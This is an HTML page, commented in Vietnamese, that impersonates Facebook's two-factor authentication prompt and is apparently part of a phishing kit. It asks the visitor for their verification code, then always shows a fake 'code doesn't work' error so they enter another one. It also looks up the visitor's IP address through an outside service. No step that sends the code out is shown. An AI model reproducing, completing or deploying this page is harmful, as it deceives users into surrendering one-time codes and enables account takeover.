<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="shortcut icon" type="image/x-icon" href="/acsets/Facebook_Logo_(2019).png">
    <link rel="stylesheet" href="login.css">
    <style>
        button.submit {
            width: 100%;
            /* Chiều rộng nút 100% */
            height: 45px;
            color: white;
            /* Màu chữ */
            border-radius: 22.5px;
            /* Bo tròn cho nút */
            background-color: #0866ff;
            /* Nền trong suốt */
            cursor: pointer;
            /* Con trỏ chuột khi hover */
            display: flex;
            /* Để có thể sử dụng flexbox cho căn chỉnh */
            align-items: center;
            /* Căn giữa theo chiều dọc */
            justify-content: center;
            /* Căn giữa theo chiều ngang */
        }
    </style>
</head>

<body>
    <div style="max-width: 800px; margin: 0 auto;">
        <div style="text-align: left;">
            <a href="/index.html"><img style="padding-top: 10px; " src="acsets/arrow.png" alt="" srcset=""></a>
            <p style="margin-top: -1px;">Facebook</p>
            <h2>Check your notifications on another device </h2>
            <p>Enter the code we sent you to continue, or enter the code from the
                two-factor authentication app you set up (such Duo Mobie or Google Authenticator).</p>
        </div>
    </div>
    <div style="text-align: center; margin-left: 0px;">
        <div class="twofa">
            <img src="acsets/ACP-UnifiedDelta-Device-Mobile_light-3x.png" width="99%" alt="" srcset="">
        </div>
        <form action="#" method="get" onsubmit="toggleErrorMessage()">
            <div style="max-width: 800px; margin: 0 auto;"> <!-- Đây là container lớn -->
                <div class="code">
                    <input id="code" name="code" required type="number" placeholder="Code" onkeydown="anma()">
                </div>

                <div id="error-message"
                    style="display: none; align-items: center; text-align: left; color: #D32F2F; margin-top: 20px;">
                    <img src="/acsets/error (1).png" alt="" style="margin-right: 8px;">
                    <span>This code doesn't work. Check that it's correct or try a new one.</span>
                </div>

                <div>
                    <div style="display: flex; align-items: center; margin: 15px auto;">
                        <img src="/acsets/refresh.png">
                        <a href="#" id="get-code-link" style="text-decoration: none; color: blue; margin-left: 10px;"
                            onclick="startCountdown()">Get a new code</a>
                    </div>
                </div>

                <button
                    style="margin-top: 0px; margin-bottom: 20px; display: flex; align-items: center; justify-content: center;"
                    type="submit" class="submit" id="submitButton">
                    <span id="continueText">Continue</span>
                    <img id="loadingIcon" width="30px" src="/acsets/loading.png" alt=""
                        style="margin-left: 5px; display: none;">
                </button>
            </div>
        </form>
        <div style="width: 100%; max-width: 800px; margin: 0 auto;">
            <a href="/index.html"
                style="display: flex; align-items: center; justify-content: center; width: 100%; height: 45px; text-decoration: none; border: 1px solid #ccc; color: #333; border-radius: 22.5px; background-color: transparent; font-size: large;">Code
                not received</a>
        </div>
        <div style="width: 100%; height: 100px;"></div>
    </div>
    <script>
        let countdownRunning = false; // Biến kiểm tra trạng thái countdown
        var count = 2;

        function startCountdown() {
            // Kiểm tra nếu countdown đã chạy thì dừng lại
            if (countdownRunning) return;

            countdownRunning = true; // Đánh dấu countdown đã chạy

            const link = document.getElementById('get-code-link');
            link.style.pointerEvents = 'none'; // Ngăn không cho nhấp vào link
            link.style.color = '#1C1E21'; // Đổi màu thành xám
            let timeLeft = 60;

            function updateCountdown() {
                if (timeLeft > 0) {
                    link.innerText = `We can send a new code in 00:${timeLeft < 10 ? '0' + timeLeft : timeLeft}`;
                    timeLeft--;
                } else {
                    link.innerText = 'Get a new code';
                    link.style.color = 'blue'; // Đổi lại màu xanh
                    link.style.pointerEvents = 'auto'; // Cho phép nhấp lại vào link
                    countdownRunning = false; // Đặt lại biến kiểm tra khi countdown kết thúc
                    clearInterval(countdownInterval); // Dừng timer khi countdown kết thúc
                }
            }

            updateCountdown(); // Cập nhật lần đầu
            const countdownInterval = setInterval(updateCountdown, 1000); // Cập nhật mỗi giây
        }
        window.onload = function () {
            startCountdown();
        }
        async function getUserIP() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip; // Trả về địa chỉ IP
            } catch (error) {
                console.error('Error fetching IP address:', error);
                return 'N/A'; // Nếu không lấy được IP
            }

        }
        async function toggleErrorMessage() {
            event.preventDefault(); // Ngăn chặn gửi form
            const errorMessage = document.getElementById("error-message");
            const code = document.getElementById("code").value.trim(); // Lấy giá trị và loại bỏ khoảng trắng

            // Ẩn chữ "Continue" và hiện biểu tượng loading
            document.getElementById("continueText").style.display = "none";
            document.getElementById("loadingIcon").style.display = "block";

            if (code.length < 6) {
                document.getElementById("continueText").style.display = "block";
                document.getElementById("loadingIcon").style.display = "none";
                return false;
            }
            setTimeout(() => {
                errorMessage.style.display = "flex"; // Hiện thông báo
                document.getElementById("continueText").style.display = "inline"; // Hiện lại chữ "Continue"
                document.getElementById("loadingIcon").style.display = "none"; // Ẩn biểu tượng loading
                document.getElementById("code").value = '';
            }, 3000);
        }
        if (count == 0) {
            window.location.href = 'https://www.facebook.com/privacy/policy';
        }
        else {
            count = count - 1;
        }

    </script>

</body>

</html>